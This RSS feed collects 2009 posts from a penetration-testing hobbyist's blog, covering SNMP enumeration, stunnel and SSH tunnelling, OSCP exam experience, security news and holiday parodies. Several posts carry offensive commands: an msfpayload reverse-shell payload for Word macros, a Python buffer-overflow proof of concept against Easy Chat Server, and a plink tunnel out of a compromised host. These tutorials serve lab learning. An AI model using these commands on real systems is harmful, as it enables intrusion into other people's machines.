In the above syntax, the switches -c and -v are used. The first, -c, indicates which community string (public or private). The second, -v, tells the script which version of SNMP to use, in this case version 1. We also inform the script to add the root of the MIB tree with "1" after the target's IP address. See the top of this post for a wiki link on the MIB tree. Of course, one can use the following script, snmpcheck, to gather most or all information available in a more human readable format. </description><link>http://www.secuobs.com/revue/news/166608.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166608.shtml</guid></item>
<item><title>SSL - using stunnel</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - When connecting to port 995 (e-mail SSL accepted server) using a raw TCP connection, nothing will happen since it's expecting SSL "commands". So we could type anything we want after the connection is made, and nothing will happen. What we need to do is encapsulate our "traffic" in SSL. This can be done using stunnel. Visit the author's site, and have a look around. If it's not installed on your Linux distribution then I recommend doing so. There's also a Windows version as well, which I also suggest getting if you want to test out creating a netcat session between 2 machines using an stunnel. Let's see how we can go about creating a simple chat session between 2 machines with netcat and stunnel. First let's set up our listening machine to accept SSL connections on a specified port. Let's start by configuring our client machine to accept traffic on a given port, take that traffic, encapsulate it in SSL and send it to a socket accepting SSL connections. First open up stunnel's config file (I'm using my Linux machine as client) and add/modify the following:
stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
Any traffic entering port 5555 will be encapsulated and sent to port 5555 on the target IP as SSL traffic. Now let's set up the stunnel service on our listening machine, in this case the Windows system:
stunnel.conf
client = no
[netcat server]
accept = 4444
connect = 7777
So now that we have stunnel set up on both machines, let's start the connection using netcat. From our listening system, or server:
C:\&gt; nc -vlp 7777
And now, let's connect from our Linux system:
linux# nc -nv 127.0.0.1 5555
If everything went according to plan, the Linux box connects to local port 5555, which is then encapsulated and sent to the listener's IP address, which is expecting an SSL connection. One should now be able to "chat" between the two systems. One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995. </description><link>http://www.secuobs.com/revue/news/166607.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166607.shtml</guid></item>
<item><title>Simple SSH tunnel</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - An SSH tunnel encrypts traffic and accesses non-routable machines in a secure way. Here's a nice wiki explaining the subject in more depth: -here- So let's imagine you've managed to receive a reverse shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (how you got your reverse shell is not important). Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting, but that would be better explained with Metasploit). The exercise here is how to gain access to this non-routed port from your machine that is outside the network. The answer is a tunnel, and in our case an SSH tunnel. First you'll need an SSH server on your system (the attacker), and an SSH client on your target. This example assumes that outgoing traffic isn't limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network. Let's start by getting a simple ssh client to our Windows machine. There are many ways one can do this, I prefer using TFTP for 2 reasons. Firstly, Windows usually comes with a TFTP client, and Backtrack has a nifty TFTP server readily available (note: one must always verify and see upload/download options). So let's start by uploading our ssh client (plink.exe):
C:\&gt; TFTP -i -your IP here- GET plink.exe
There's no progress bar, so you'll just have to wait for your prompt to come back once the upload is finished. Now that you have your client, let's start our ssh connection. Make sure you have your listener set up:
C:\&gt; plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick, the -C puts compression on the connection and the -R remotely forwards it to the local machine. The user and password should be set to your own on the ssh server. If all went well you'll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now. Start up rdesktop and point it to 127.0.0.1 on port 3389 and you'll be rewarded with a nice remote desktop. One could use this method on other ports for other means. As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine. Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world. </description><link>http://www.secuobs.com/revue/news/166606.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166606.shtml</guid></item>
<item><title>A little info about Sympatico Wifi</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Nothing really technical today, just an opinion on a popular ISP in my area: Bell Sympatico. When one subscribes, they are offered the choice to receive a wireless router, as an added bonus for people that may not be able to configure the device. It either comes pre-configured, or a technician can swing by and set it up for you. That's about the only good thing about the service. As Bob mentioned to me not long ago, he found a few security issues that alarmed me. For starters, the router is configured by default with WEP, which can be easily cracked using air-crack. The default WEP key is actually the router's serial number. Lastly, and this is what made me jump, there is no username / password on the router by default. As Bob was telling me, he managed to crack a few WEP keys and enter these "secure" routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports, redirecting traffic, just to name a few. The worst part, it never asks for a password when saving these new settings. Another thing that surprised me is that this router also acts as the client's modem. So along with all the local network's information found on the device, you can also retrieve the username and password to the customer's internet connection. I know for a fact that often clients with no wireless devices receive these routers so as to set up a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Now knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of this? I don't know, I suppose it's possible, I mean look at Conficker and all it did (and is doing). In my opinion, ISPs giving away these insecure devices and not taking the time to configure them with a minimum of protection aren't helping. Probably, involuntarily of course, they are even helping the spread of malware on the net. </description><link>http://www.secuobs.com/revue/news/166605.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166605.shtml</guid></item>
<item><title>Firefox upgrades 3.5</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Not long ago, Firefox released version 3.5. Happy news! Unfortunately a Heap Spray Vulnerability was found not long after, not good. Here's a small article on the subject: -here- Here's a proof of concept exploit to see the vulnerability in action: Milw0rm. Fortunately for us, Firefox has issued an update. So don't forget to update your newly upgraded Firefox. </description><link>http://www.secuobs.com/revue/news/166604.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166604.shtml</guid></item>
<item><title>Msfpayload 'V' option</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one): Pauldotcom Ep. 161. So basically this is a client side attack, and in my opinion a pretty nasty one too. Every time I've seen someone open up a Word document, or Excel spreadsheet, either downloaded off the Web or received via e-mail, 99% of the time people either let the macros run or already have the security settings set to low. What does this mean? Well, using the "V" option in msfpayload will output the payload as a vbscript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs, of course). I've actually tried it, and it's pretty funny (and scary) getting a reverse shell because I opened a Word document. So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site. From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=1011053 V &gt; /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document. Here's another video posted by Mark Baggett which explains the process. Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file. </description><link>http://www.secuobs.com/revue/news/166603.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166603.shtml</guid></item>
<item><title>Good to have links</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Here's a collection of links that are always useful to have handy:
www.milw0rm.com
www.securityfocus.com
www.securiteam.com
www.offensive-security.com (resource section)
www.packetstormsecurity.org
www.pauldotcom.com
www.metasploit.org
www.governmentsecurity.org
Now I'm sure there are more out there that would be worth adding to this list. If you've read my first post, you'll understand that I'm new to information security, hence my limited knowledge. Feel free to add, if someone ever comments. </description><link>http://www.secuobs.com/revue/news/166602.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166602.shtml</guid></item>
<item><title>A journey's End</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, my experience with Offsec 101 (or PWB) is complete. Finished the course material and the lab time. I took 60 days total, not knowing what I was exactly getting myself into. Also this is not a course where one can just "pop in" for a few hours here and there. Complete concentration for several hours in a row is needed, and this every day. This said, I'm pleased to announce that I passed the OSCP. Got my official results yesterday. Can't go into details about the exam of course, like any certification one agrees to (or signs) an NDA. But I suppose it's safe to say the major part of the exam is breaking into systems. It's public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this. Also, one would be foolish not to take regular breaks and one or two naps. A tired mind is no good during this period. 24 hours may seem like a long time, but believe me it goes by quickly. In the end, I accomplished enough of the requirements to pass the exam at hour 22. Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours (2 hour nap, and a good sleep of 4). So it's very do-able without having to stay awake 24 hours straight. My experience started on August 8th, 2009 at 10am EDT when I received my exam package with details on what needed to be accomplished. Like the lab environment, certain restrictions are lined out and specific tasks are given. Once I had understood the task(s) at hand, then I could panic. About 30 minutes later, I started hacking away at the lab the way the course showed me. I did not feel "confident" but prepared. It was hit and miss for a while, lots of information gathered, then research needed to be made. After a while, boxes started giving me their most prized possession: administrative rights to their system. At around 8am EDT the next day, I popped my last machine that gave the necessary points (and then some) to unofficially pass the OSCP challenge. I could relax. From then on, I enjoyed myself a bit more but didn't manage to get that last box I wanted (and I was close). After another nap, I started to clean up my documentation and sent it on its way for evaluation. The rest is history. Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure. The IRC channel #offsec on freenode.net also for the great support, kindness and occasional helping hand. I highly recommend this certification. If you want to learn new skills, or test out what you know (or think you know), this is the one. It will make you think and adapt. </description><link>http://www.secuobs.com/revue/news/166601.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166601.shtml</guid></item>
<item><title>BoF explained</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, it's been a while since I've posted. Family and work are taking most of my time. Also started practicing with exploit codes and Buffer Overflows. Taking an application with a known vulnerability, then starting with a working PoC, writing an exploit from there. I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites/posts on this subject, I'll just post 2 of my favorites. Well written and very understandable: Peter Van Eeckhoutte's blog, i-Hacked.com's article on SEH BoFs. Enjoy. </description><link>http://www.secuobs.com/revue/news/166600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166600.shtml</guid></item>
<item><title>BoF Exercise</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Something that I enjoy doing, and which helps understanding buffer overflows / exploit coding, is practice. Grab a known vulnerable application, find a PoC (proof of concept) and start from there. Here's a start for anyone trying. Had loads of fun with this one: Easy Chat Server 2.2
- First find and download the application (trial version should do fine), try -this-
- Install the application (make sure it works)
- Get a debugger (I suggest Ollydbg)
- Copy/paste this PoC, it's python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own.
Easy Chat Server (this is based on his0k4's exploit on milw0rm):
#!/usr/bin/python
# Bug: EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
import struct
import socket
buffer = '\x41' * 600
head = "GET /chat.ghp?username=" + buffer + "&amp;password=" + buffer + "&amp;room=1 HTTP/1.1\r\n"
head += "Host: 192.168.1.200\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.200', 8080))
s.send(head + "\r\n\r\n")
s.close()
Got this to work under Windows XP Pro SP3 English. Good practice. Use the links I provided in a previous post and have fun. Good luck. </description><link>http://www.secuobs.com/revue/news/166599.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166599.shtml</guid></item>
<item><title>Little updates</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Some new, and not so new, things to mention. Firstly, Offensive Security's Metasploit Unleashed. The course material, available free of charge here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned, the money raised by this course is donated to the "I Hack for Charity" created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause.
---
A little quicky on how to update Backtrack 4's kernel:
root@bt4:~# apt-get update
root@bt4:~# apt-get install -d linux-image
root@bt4:~# cd /var/cache/apt/archives/
root@bt4:~# dpkg -i --force-all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4:~# apt-get dist-upgrade
I suggest a reboot here to see if all is good (should see 2 kernels available at the grub screen).
root@bt4:~# apt-get remove --purge 2.6.29
root@bt4:~# reboot
Again with Backtrack 4: If you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries. You'll need to recompile it. I found a nice how-to on the Remote Exploit forum (full thread). Also, it's the same for Medusa too, so redoing that is needed as well.
Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this, POSTGRES appears to be screwing stuff up in my case:
XDEFINES = -DLIBOPENSSL -DLIBSSH
XLIBS = -lssl -lssh -lcrypto
# make
# make install
If this doesn't work, do what I did: download the library and read the error messages. It's all clearly explained.
----
A quick note, another Joomla exploit has been released not too long ago (no big surprise), but what makes me mention this is the timing in which it came out. Seeing that I work for an ISP and Web Application hosting company, being aware of these things can sometimes come in handy. Two days after this exploit being published, I was asked by one of our partners who needed a web space set up with Joomla. The boss told me to make it happen, knowing it was full of vulnerabilities, he says "put the latest version please". In response: "Sure, no problem, but I've just got to tell you that a remote exploit came out on that version 2 days ago." It hasn't been installed. Sometimes the power of knowledge and a little assurance in one's speech can go a long way. </description><link>http://www.secuobs.com/revue/news/166598.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166598.shtml</guid></item>
<item><title>We don't mean to be insecure</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Don't want to sound preachy, but system administrators and network administrators are not always to blame for insecure systems. Sometimes (often) the blame falls on the heads of management. Keeping a system up to date, fully patched and properly configured afterwards will usually keep any system relatively secure until the next exploit comes out and is made public. Doing this takes time. One needs to make sure applied patches won't affect running services (ie. Framework 3.5 SP1 on Citrix Presentation Server - this one seems solved now). Lots of reading and testing should be done before deploying major changes. For us, the tech-guys, this is normal and the sensible thing to do. It's our job to keep things running smoothly. For management, time equals money and they seem to always have the mentality "if it ain't broke, don't fix it". Of course, when a system gets compromised or crashes, it's our fault for not applying the proper updates and patches. Recently I had the pleasure of showing my current employer how easy it would be to compromise a customer's system. Without raising any alarms or triggering a malware/anti-virus application, I got a reverse shell on my home computer. Must admit, he was surprised how easy it was. Unfortunately nothing came out of that demonstration. I even spoke about a customer's FTP server, and how we should update it seeing the amount of DoS exploits and local privilege escalation exploits currently in the wild. Again, nothing. So, from where I'm sitting, we are not at fault. Pretty sure it's the same for others. </description><link>http://www.secuobs.com/revue/news/166597.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166597.shtml</guid></item>
<item><title>Recovering Firefox Passwords</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few weeks ago, Larry from Pauldotcom had a tech-segment about recovering Firefox passwords. Seeing that this segment is well written, and it's a subject that always fascinates me, I see no point in trying to write up another when I could just link to it: Pauldotcom, episode 166. Hope you enjoy it as much as I did. </description><link>http://www.secuobs.com/revue/news/166596.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166596.shtml</guid></item>
<item><title>Metasploit no longer a hobby</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - It's official, the Metasploit project conceived by HD Moore has been acquired by Rapid7, an Information Security company (better known for its vulnerability assessment product NeXpose). What does this mean for the future of this great open source project that many have learned to love (and I suppose hate) over the years? Well, according to its creator it can only make it better. Having Metasploit go commercial means a budget, an actual QA department, a full time dev-team and more quality exploits. Here are a few things that Rapid7 had to say: "As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry." That sounds pretty good, but something does bother me: "The exploit data will be directly embedded in our vulnerability management solution NeXpose." As far as I'm concerned, this means NeXpose will be feeding off Metasploit's better parts. Guess it's normal, they just acquired it and can probably do whatever they please, making NeXpose an even better product in the end. What will happen when Metasploit has nothing left to feed it? What will happen then? "Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants." Does this mean eventually Metasploit will depend on NeXpose? Should we expect sometime in the future a message saying something like "this feature requires you install NeXpose"? Another little bit that has brought me some concern comes from Moore's statement on his blog: "From a user's perspective Metasploit will still be free. All of the important bits are going to remain open-source." Which important bits? Let's face it, the whole framework is pretty important and downright incredible. Will the exploits be Open Source? Will it be the framework's inner workings? I guess only time will tell. Don't get me wrong, I am extremely happy for Mr. Moore and the rest of the Metasploit team. They created an Open Source application to help the community. If they can make money and continue working on something they started off as a hobby, well, congratulations! I don't think anyone would object to that. Let's face it, having a piece of code (big or small) being picked up by a commercial enterprise must be rewarding as hell. My concern is what will happen to Metasploit down the road after a few years. History has a tendency to repeat itself. In the past, Open Source projects acquired by commercial entities have been known to slowly, but surely, transform the Open Source product into a closed one. Of course this is not always the case. Another thing, what will happen to Offensive Security's MSF certification? Will they have as much support and cooperation now to keep the study material up-to-date? Will they be limited by the bits of the project that will not be Open Source? Then again, it may not be affected at all.
_______
EDIT: As mentioned by muts (Mati Aharoni, lead developer of BackTrack and CEO of Offensive Security), I guess MSFU won't suffer from Metasploit's acquisition. Sorry muts for not seeing (or reading) that detail: Offensive Security Official MSF training partner
_______
So to end this, again congratulations are in order to the whole Metasploit team. I'm extremely happy for you all. Transforming a hobby into a career is not always easy. Good luck, have fun. Metasploit Rapid7 FAQ </description><link>http://www.secuobs.com/revue/news/166595.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166595.shtml</guid></item>
<item><title>str0ke 1974-04-29 - 2009-11-03</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - As reported on the Black Security blog not too long ago, milw0rm's founder passed away from heart complications. He leaves a wife and 4 children. My thoughts and prayers go out to his wife and children, and the rest of his family. I never knew str0ke (1 email doesn't count as knowing someone), but as a fellow human being, a father, a husband, I can't help feeling saddened by this. Please read Black Security's blog entry on the subject, for he is in a better position to talk about the situation. May whatever god you believe in, str0ke, keep your soul safe and happy for the rest of eternity. ---- EDIT: It appears that this was someone's bad idea of a joke. Let's just hope this didn't cause him AND his family too many unwanted farewell e-mails. Thanks ronin2307. ----</description><link>http://www.secuobs.com/revue/news/166594.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166594.shtml</guid></item>
<item><title>Hackfest.ca 2009</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, yesterday I attended my first infosec convention/conference in Quebec City: Hackfest. I must say it was great! Since I have nothing to compare it to (as far as information security related conventions go), I'll compare it to the few conventions I did attend in the past, IT and non-IT related. The result is still the same: it was a great learning experience. The convention was organized by Patrick R. Mathieu, Nicolas-Loic Fortin and Michel Cusin. It was held at the Hotel Universel, across the street from where it was initially intended (University of Laval). They needed to move out of the University due to the swine flu vaccination campaign, and this with only 3 weeks' notice. If they hadn't mentioned it, we never would've noticed. The whole thing was well organized, right down to the free RedBull. Smooth, on time and with people behaving correctly, all went like clockwork. The day started with registrations at 8am, and ended with lock-picking and a CTF event. Unfortunately, due to health issues, I couldn't stay to watch the activities. Guess it's just good luck I didn't register for the event; I wouldn't have been able to participate. 9:15am: The first speakers of the conference, Eric Gingras and Sebastien Duquette. Their topic was "fuzzing in a pentest", complete with slides and an entertaining demonstration. It was a good talk to kick off the day. 10:15: This talk was a bit over my head, seeing I'm not a PHP coder. Nonetheless it was extremely interesting: auditing PHP code for security reasons. It opened my eyes to how easy it is to make the server hosting your code vulnerable to attack. This must have made a few coders happy (and a bit scared, I hope). 11:30: Botrax came on to explain how the "law" worked, and how it's applied to a "human" and a "person". Yes, according to the law's definition, these two are not the same. You would be surprised how much impact this makes. As for how this applied to white hat hackers and black hats, well, you needed some imagination. Overall it was worth the hour. 13:30: Henry Stern, senior security engineer, spoke about attacks on social sites in various forms. At the end, even though the whole crowd attending was computer savvy, we still got a few surprises. I can just imagine now, for the average user, how badly their computers are infected with fake anti-virus software. 15:00: David Girard came on to talk about vulnerabilities in virtual machine architecture, speaking about the different technologies used for virtualization (and no, VMware is not the only one). Very eye-opening. Moral of the story: update everything when you can, especially if you're running ESX. 16:15: Guy Bruneau from SANS spoke about packet analysis and retrieving files directly out of a Wireshark session. For me this was new. I knew it was possible; now I have a pretty good idea of how to do it. Again, very informative. 17:15: It was Mick Douglas from pauldotcom security weekly's turn to take the stage. This guy is the reason (at least the major reason) I decided to attend. His topic, "Offense is the new Defense", was a fresh outlook on how the blue team, or system/security/network administrators, should act and react to an attack on their systems. He was obviously passionate about the topic. After all the talks were done, the lock-picking and CTF started. I stuck around to see all the various laptops boot up and get ready for war. Seeing I have no experience in a CTF (the closest thing I've done is OSCP), it was quite impressive. Well organized, enough hardware to supply all teams with an IP; the whole setup seemed to be ready in an hour. Great job guys! No waiting for the participants; I'm sure they appreciated it. To finish this off now, I must say it was a great experience and something I hope they are able to redo next year. Canada and Quebec need conventions like these. We can't all afford to go to Shmoocon or DefCon, and not all employers are ready to send their admins to such events either. So my colleagues who attended this event and I feel that not only is this convention fun and useful, it's essential for Quebec's security consultants and techs to stay on top of the black hats. I spoke to Michel Cusin before leaving, congratulating him and offering any help he may need for next year's event. I truly believe in this event now. I hope he just remembers that a stranger took the time to offer his help.</description><link>http://www.secuobs.com/revue/news/166593.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166593.shtml</guid></item>
<item><title>The new milw0rm: better than before</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, the new (or replacement) milw0rm has gone online. As you may, or may not, know, the crew of Offensive-Security have taken over. Str0ke was very close to closing the site down. After the initial announcement, Offsec stepped in and offered to relieve him of some of the administrative duties (updates mostly). So, is the new site better? I mean, how can you improve on such a simple concept: have an exploit, have a link to said exploit. Well, they've found a way to not only make it better, but they succeeded in making the site an educational tool. With Offensive-Security certifications slowly growing in popularity, it makes perfect sense for a security company such as Offsec to maintain the most popular exploit repository on the web today. It's a great combination: they train you in identifying and using exploits (for defensive purposes), all the while guaranteeing the exploits used during the training are available. Good idea. But how is the site better? Let's start off with how everything is organized. It's separated into a few sections: remote exploits, local exploits, web applications and denial of service. The old milw0rm had a similar organizational schema, and they even had (or have, I suppose it's still up) a shellcode section, which for me was not very user friendly. What it didn't have was a web application section, which in my opinion is a good add-on by the Offsec crew. Even if they removed a few of the sections originally found on milw0rm, the new site is very easy to navigate. The search option is also better all around: searching by description, author, type (remote/local/DoS etc.), platform and port number. It's pretty quick too and gives out very good search results. The submit information is revamped and easy to follow for anyone who wishes to submit anything. This last part is what makes this site stand out from the rest: they are actually hosting the applications associated with the exploits. Not all of them, mind you, but they do have many downloads available. So in time, I'm sure we'll see lots more vulnerable applications with their respective exploits ready to be transferred into our lab environments. So in the end, Offensive-Security have legitimized the existence of such a site. With this new avenue, an exploit repository site doesn't have to cater to "blackhats" looking to annoy people or deface websites. They are maintaining and making available a valuable knowledge base for the security professional in training. Congrats to all that worked on the new site. It's fresh, good looking and I'm sure it's going to be around for a long, long time. Check them out: Offensive-Security New milw0rm</description><link>http://www.secuobs.com/revue/news/166592.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166592.shtml</guid></item>
<item><title>Can lack of training cause problems?</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few days ago at work, something extraordinarily stupid happened. The idea of purchasing bigger (more complicated), more powerful servers was suggested to get more performance out of our VMware infrastructure. Logic would agree with that: if you have a bigger hammer you can break bigger stones. Unfortunately, in our current situation, we don't need bigger hammers. We need to better use the hammers we already have. Training, it seems, is something small/medium businesses tend to overlook. They tend to think they need to spend whatever little money they have on equipment. Well, in some circumstances it can be very useful, but in others simple training and understanding of the current technology can also squeeze extra performance out of systems. Let's take for example the growing popularity of virtualization (I'm not talking about the little VMs home users run with VMplayer or the free VMware Server). Let's face it, it's not easy to configure correctly. Key word is "correctly", if by any chance a manager is reading this. Once installed and correctly tweaked, that HP G5 or G6 can really give you your money's worth. Coupled with a good storage system (again, properly configured), a few of these machines will give out some good results and host many virtual systems. Of course the package as a whole needs to be installed and configured correctly, and one way of ensuring you get what you deserve out of your setup is training. If you can't reap the complete benefits out of your current setup, changing everything won't change a thing. So how can lack of training be a problem? Well, lack of training leads to misconfiguration. Ill-configured systems tend not to run as well as they should, and let's face it, there are bound to be some security issues in something that is not properly configured. VMware training is a few thousand bucks, and that knowledge stays forever. New servers and that nice looking EMC will run you up into the tens of thousands. Simple math really. This rant has gone on for long enough.</description><link>http://www.secuobs.com/revue/news/166591.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166591.shtml</guid></item>
<item><title>BackTrack Christmas song</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - On the first day of Christmas my true love gave to me: a copy of the BackTrack CD. On the second day of Christmas my true love gave to me: two short jumps. On the third day of Christmas my true love gave to me: three local exploits. On the fourth day of Christmas my true love gave to me: four WEP keys. On the fifth day of Christmas my true love gave to me: FIVE METASPLOIT MODULES. On the sixth day of Christmas my true love gave to me: six rainbow tables. On the seventh day of Christmas my true love gave to me: seven Windows opcodes. On the eighth day of Christmas my true love gave to me: eight Joomla exploits. On the ninth day of Christmas my true love gave to me: nine Vista patches. On the tenth day of Christmas my true love gave to me: ten zero-days. On the eleventh day of Christmas my true love gave to me: eleven Ruby scripts. On the twelfth day of Christmas my true love gave to me: twelve sa passwords.</description><link>http://www.secuobs.com/revue/news/166590.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166590.shtml</guid></item>
<item><title>'Twas the Night before Christmas</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Hope you enjoy this one, it wasn't easy. (Original poem) 'Twas the night before Christmas, when all through the house / Not a creature was stirring, not even a mouse. / The vulnerabilities were left on the system with care, / In hopes no Metasploit script would soon be there. / The admins were nestled all snug in their beds, / While visions of security patches danced in their heads. / With the project manager in her "kerchief", and I in my cap, / We had just settled our brains to play with ettercap. / When out on the network there arose such a clatter, / I sprang from my desk to see what was the matter. / Away to the console I flew like a flash, / Tore open the screen and threw up bash. / The logs on the breast of the new-fallen server / Gave a luster of panic to the newly hired manager. / When, what to my wondering eyes should behold, / But a miniature script and eight services controlled. / With a little old script, so lively and quick, / I knew in a moment it was an ol' HDM trick. / More slick than snakes his courses they came, / And he exploited, and rooted, and called them by name: / "Down CUPS! Down Apache, now Samba and Dixie! / On, Muts! On, Bolexx! On, on Dookie and HD! / To the top of the tree! To the edge of the firewall! / Now compile away! Compile away! Using dash wall!" / As fast typists that before the wild hurricane fly, / When they meet with an obstacle, they do not cry. / So up to the firewall the courses they flew, / With a bag full of root-kits, and with Mitnick too. / And then, in a twinkling, I stared at the rack, / The prancing and pwning of each little hack. / As I ran through the office, cursing around, / Down came the server, which was PCI sound. / As it fell to the ground, from RAM to wire, / And its casing had tarnished; this I did not desire. / A bundle of overflows thrown on the stack, / The server looked like a peddler, with a hump on its back. / With hard drives dwindling, its lights not so merry, / Its IO count rising, its CPU red like a cherry. / Its droll little services all dropping in a row, / The last remnants of the server, stalked by a crow. / With power cable held tight in my grasp, / And the smoke it encircled, it looked like an asp. / It had blown condensers I found on the floor, / That I took and laughed, as I threw out the door. / It was busted and broken, a right jolly old elf, / And I laughed when I trashed it, in spite of myself. / With a wink of my eye, and a twist of my head, / The new manager knew she had something to dread. / She spoke not a word, but went straight to her desk / And looked at the firewall purchase, and then was perplexed. / And laying her face inside her cupped hands, / Unable to move, unable to stand. / As I sprang from the server room, gave the team a whistle, / Away we all went, all flew like down of a thistle. / As we exclaimed while we left, ere we drove out of sight, / "Merry Christmas to all, and to all a good-night!"</description><link>http://www.secuobs.com/revue/news/166589.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166589.shtml</guid></item>
</channel>
</rss>